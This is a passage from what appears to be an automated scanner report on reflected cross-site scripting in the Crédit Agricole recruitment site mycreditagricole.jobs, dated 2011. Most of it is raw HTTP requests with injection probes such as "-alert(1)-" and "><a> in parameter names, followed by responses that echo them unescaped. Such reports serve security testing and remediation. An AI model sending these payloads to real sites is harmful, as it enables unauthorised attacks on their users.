The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2e4f"-alert(1)-"8ceaf077820 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap.php?d2e4f"-alert(1)-"8ceaf077820=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:05:00 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:05:00 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
ap - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Recruitment site map - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/sitemap.php?d2e4f"-alert(1)-"8ceaf077820=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.104. http://www.mycreditagricole.jobs/stud_campus_captains.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_captains.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85196"-alert(1)-"6b97bf3b912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_campus_captains.php?85196"-alert(1)-"6b97bf3b912=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:18 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:18 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>School
...[SNIP]...
tment Group";
var SharingBaseTitle = "School Captains - Campus - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_campus_captains.php?85196"-alert(1)-"6b97bf3b912=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.105. http://www.mycreditagricole.jobs/stud_campus_captains.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_captains.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 385cd"><a>6f8881111c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_campus_captains.php?385cd"><a>6f8881111c3=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:52 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:52 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>School
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_campus_captains.php?385cd"><a>6f8881111c3=1" />
...[SNIP]...

1.106. http://www.mycreditagricole.jobs/stud_campus_forums.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d96b"><a>337c3524942 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_campus_forums.php?6d96b"><a>337c3524942=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:53 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:53 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 98451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_campus_forums.php?6d96b"><a>337c3524942=1" />
...[SNIP]...

1.107. http://www.mycreditagricole.jobs/stud_campus_forums.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f1ca"-alert(1)-"020afe0e083 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_campus_forums.php?6f1ca"-alert(1)-"020afe0e083=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:30 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:30 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 98472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
cole Recruitment Group";
var SharingBaseTitle = "Forums - Campus - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_campus_forums.php?6f1ca"-alert(1)-"020afe0e083=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.108. http://www.mycreditagricole.jobs/stud_campus_partnerships.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_partnerships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5623"><a>c4c48b6ab07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_campus_partnerships.php?a5623"><a>c4c48b6ab07=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:47 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:47 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Partner
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_campus_partnerships.php?a5623"><a>c4c48b6ab07=1" />
...[SNIP]...

1.109. http://www.mycreditagricole.jobs/stud_campus_partnerships.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_partnerships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91409"-alert(1)-"f9476546768 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_campus_partnerships.php?91409"-alert(1)-"f9476546768=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:11 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:11 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Partner
...[SNIP]...
ment Group";
var SharingBaseTitle = "Partnerships - Campus - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_campus_partnerships.php?91409"-alert(1)-"f9476546768=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.110. http://www.mycreditagricole.jobs/stud_internships.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_internships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e52e"><a>b9c4ca81b0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_internships.php?4e52e"><a>b9c4ca81b0c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:57 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:57 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Interns
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_internships.php?4e52e"><a>b9c4ca81b0c=1" />
...[SNIP]...

1.111. http://www.mycreditagricole.jobs/stud_internships.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_internships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eebf"-alert(1)-"2e7fd435f38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_internships.php?7eebf"-alert(1)-"2e7fd435f38=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Interns
...[SNIP]...
t Agricole Recruitment Group";
var SharingBaseTitle = "Internships - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_internships.php?7eebf"-alert(1)-"2e7fd435f38=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.112. http://www.mycreditagricole.jobs/stud_key_figures.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16544"-alert(1)-"e1334466cba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_key_figures.php?16544"-alert(1)-"e1334466cba=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:26 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:26 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
t Agricole Recruitment Group";
var SharingBaseTitle = "Key figures - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_key_figures.php?16544"-alert(1)-"e1334466cba=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.113. http://www.mycreditagricole.jobs/stud_key_figures.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62a1"><a>49e73af528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_key_figures.php?c62a1"><a>49e73af528=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:00 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:00 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_key_figures.php?c62a1"><a>49e73af528=1" />
...[SNIP]...

1.114. http://www.mycreditagricole.jobs/stud_orsay.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_orsay.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb21f"-alert(1)-"72917e5ca44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_orsay.php?fb21f"-alert(1)-"72917e5ca44=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:14 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:14 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>CA Inte
...[SNIP]...
uitment Group";
var SharingBaseTitle = "CA International Talents program - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_orsay.php?fb21f"-alert(1)-"72917e5ca44=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.115. http://www.mycreditagricole.jobs/stud_orsay.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_orsay.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0737"><a>3725710e69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_orsay.php?a0737"><a>3725710e69b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>CA Inte
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_orsay.php?a0737"><a>3725710e69b=1" />
...[SNIP]...

1.116. http://www.mycreditagricole.jobs/stud_part_time.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_part_time.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d140d"-alert(1)-"69fd9df1e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_part_time.php?d140d"-alert(1)-"69fd9df1e71=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:19 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:19 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Part ti
...[SNIP]...
ricole Recruitment Group";
var SharingBaseTitle = "Part time student - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_part_time.php?d140d"-alert(1)-"69fd9df1e71=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.117. http://www.mycreditagricole.jobs/stud_part_time.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_part_time.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40aa6"><a>aebb601717a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_part_time.php?40aa6"><a>aebb601717a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:55 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:55 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Part ti
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_part_time.php?40aa6"><a>aebb601717a=1" />
...[SNIP]...

1.118. http://www.mycreditagricole.jobs/stud_video_room.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a96c"><a>f7d9e3abee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_video_room.php?8a96c"><a>f7d9e3abee=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:52 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:52 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54006

